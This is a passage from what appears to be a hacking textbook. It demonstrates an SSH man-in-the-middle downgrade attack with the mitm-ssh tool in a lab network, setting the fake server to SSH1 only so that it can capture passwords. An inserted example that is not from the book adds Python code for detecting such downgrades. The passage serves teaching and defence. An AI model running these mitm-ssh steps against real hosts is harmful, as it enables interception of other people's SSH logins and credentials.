412 0x700
be asked to add the new fingerprint. The mitm-ssh tool uses a configuration
file similar to OpenSSH's, since it's built from that code. By adding the line
Protocol 1 to /usr/local/etc/mitm-ssh_config, the mitm-ssh daemon will
claim it only speaks the SSH1 protocol.
The output below shows that loki's SSH server normally speaks both the
SSH1 and SSH2 protocols (its banner reads SSH-1.99, the version string a
server uses to advertise support for both), but when mitm-ssh is put in the
middle using the new configuration file, the fake server claims it only speaks
the SSH1 protocol.
From 192.168.42.250 (tetsuo), Just an Innocent Machine on the Network
iz@tetsuo:~ $ telnet 192.168.42.72 22
Trying 192.168.42.72...
Connected to 192.168.42.72.
Escape character is '^]'.
SSH-1.99-OpenSSH_3.9p1
Connection closed by foreign host.
iz@tetsuo:~ $ rm ~/.ssh/known_hosts
iz@tetsuo:~ $ ssh iz@192.168.42.72
The authenticity of host '192.168.42.72 (192.168.42.72)' can't be established.
RSA key fingerprint is ba:06:7f:d2:b9:74:a8:0a:13:cb:a2:f7:e0:10:59:a0.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.42.72' (RSA) to the list of known hosts.
iz@192.168.42.72's password:
iz@tetsuo:~ $
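The telnet banner grab above is the whole check: the first line the server sends is its identification string, and the protoversion field is what an SSH1-only impostor has to change. The script below, an added example that is not from the book or from the mitm-ssh tool, parses that string and flags a host whose banner no longer advertises SSH2 when it did before. The SSH-1.99 banner is the one shown on the page; the SSH-1.5 and SSH-2.0 banners are constructed samples, and the per-host "last seen banner" store is an assumption for illustration, not something OpenSSH keeps.

```python
import re
import socket

# Constructed sample banners. SSH-1.99-OpenSSH_3.9p1 is the one loki really
# sends on the page; the other two are invented for the example.
BANNER_BOTH = b"SSH-1.99-OpenSSH_3.9p1\r\n"     # speaks SSH1 and SSH2
BANNER_SSH1_ONLY = b"SSH-1.5-OpenSSH_3.9p1\r\n" # what a Protocol 1 server sends
BANNER_SSH2_ONLY = b"SSH-2.0-OpenSSH_8.9p1 Ubuntu-3\r\n"

_BANNER_RE = re.compile(r"^SSH-(\d+\.\d+)-(\S+)(?:\s+(.*))?$")


def parse_ssh_banner(banner: bytes) -> dict:
    """Parse an SSH identification string (RFC 4253 section 4.2).

    Format: SSH-protoversion-softwareversion [SP comments] CR LF
    protoversion 1.99 means the server speaks both SSH1 and SSH2,
    2.x means SSH2 only, and any other 1.x means SSH1 only.
    """
    first_line = banner.split(b"\n", 1)[0].rstrip(b"\r")
    text = first_line.decode("ascii", errors="replace")
    match = _BANNER_RE.match(text)
    if match is None:
        raise ValueError(f"not an SSH identification string: {text!r}")
    proto, software, comments = match.groups()
    if proto == "1.99":
        speaks = ("ssh1", "ssh2")
    elif proto.startswith("2."):
        speaks = ("ssh2",)
    else:
        speaks = ("ssh1",)
    return {
        "protoversion": proto,
        "software": software,
        "comments": comments,
        "speaks": speaks,
    }


def downgrade_suspected(known_banner: bytes, observed_banner: bytes) -> bool:
    """True if a host that used to offer SSH2 now offers only SSH1.

    This is the signal the Protocol 1 trick in mitm-ssh produces: the real
    server's banner says 1.99, the impostor's says 1.x without SSH2.
    """
    known = parse_ssh_banner(known_banner)
    observed = parse_ssh_banner(observed_banner)
    return "ssh2" in known["speaks"] and "ssh2" not in observed["speaks"]


def grab_banner(host: str, port: int = 22, timeout: float = 5.0) -> bytes:
    """Do what the telnet session on the page does: connect and read one line."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        data = b""
        while not data.endswith(b"\n") and len(data) < 255:
            chunk = sock.recv(255 - len(data))
            if not chunk:
                break
            data += chunk
    return data


if __name__ == "__main__":
    # Hypothetical per-host store of the last banner seen (an assumption for
    # this example; OpenSSH's known_hosts records keys, not banners).
    last_seen = {"192.168.42.72": BANNER_BOTH}
    for observed in (BANNER_BOTH, BANNER_SSH1_ONLY, BANNER_SSH2_ONLY):
        info = parse_ssh_banner(observed)
        flag = downgrade_suspected(last_seen["192.168.42.72"], observed)
        print(f"{info['protoversion']:>5} {info['software']:<16}"
              f" speaks={'+'.join(info['speaks'])} downgrade={flag}")
```

The check is one-sided on purpose: a server that goes from 1.99 to 2.0 has merely dropped SSH1, which is not a downgrade. On the client side the same protection is a one-line config change: an OpenSSH client of that era with `Protocol 2` in ssh_config refuses to talk to a server that offers only SSH1, so the attacker's fake server never gets a password prompt.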
On the Attacker’s Machine, Setting Up mitm-ssh to Only Use SSH1 Protocol
reader@hacking:~ $ echo "Protocol 1" >> /usr/local/etc/mitm-ssh_config
reader@hacking:~ $ tail /usr/local/etc/mitm-ssh_config
# Where to store passwords
#PasswdLogFile /var/log/mitm-ssh/passwd.log
# Where to store data sent from client to server
#ClientToServerLogDir /var/log/mitm-ssh
# Where to store data sent from server to client
#ServerToClientLogDir /var/log/mitm-ssh
Protocol 1
reader@hacking:~ $ mitm-ssh 192.168.42.72 -v -n -p 2222
Using static route to 192.168.42.72:22
SSH MITM Server listening on 0.0.0.0 port 2222.
Generating 768 bit RSA key.
RSA key generation complete.
Now Back on 192.168.42.250 (tetsuo)
iz@tetsuo:~ $ telnet 192.168.42.72 22
Trying 192.168.42.72...
Connected to 192.168.42.72.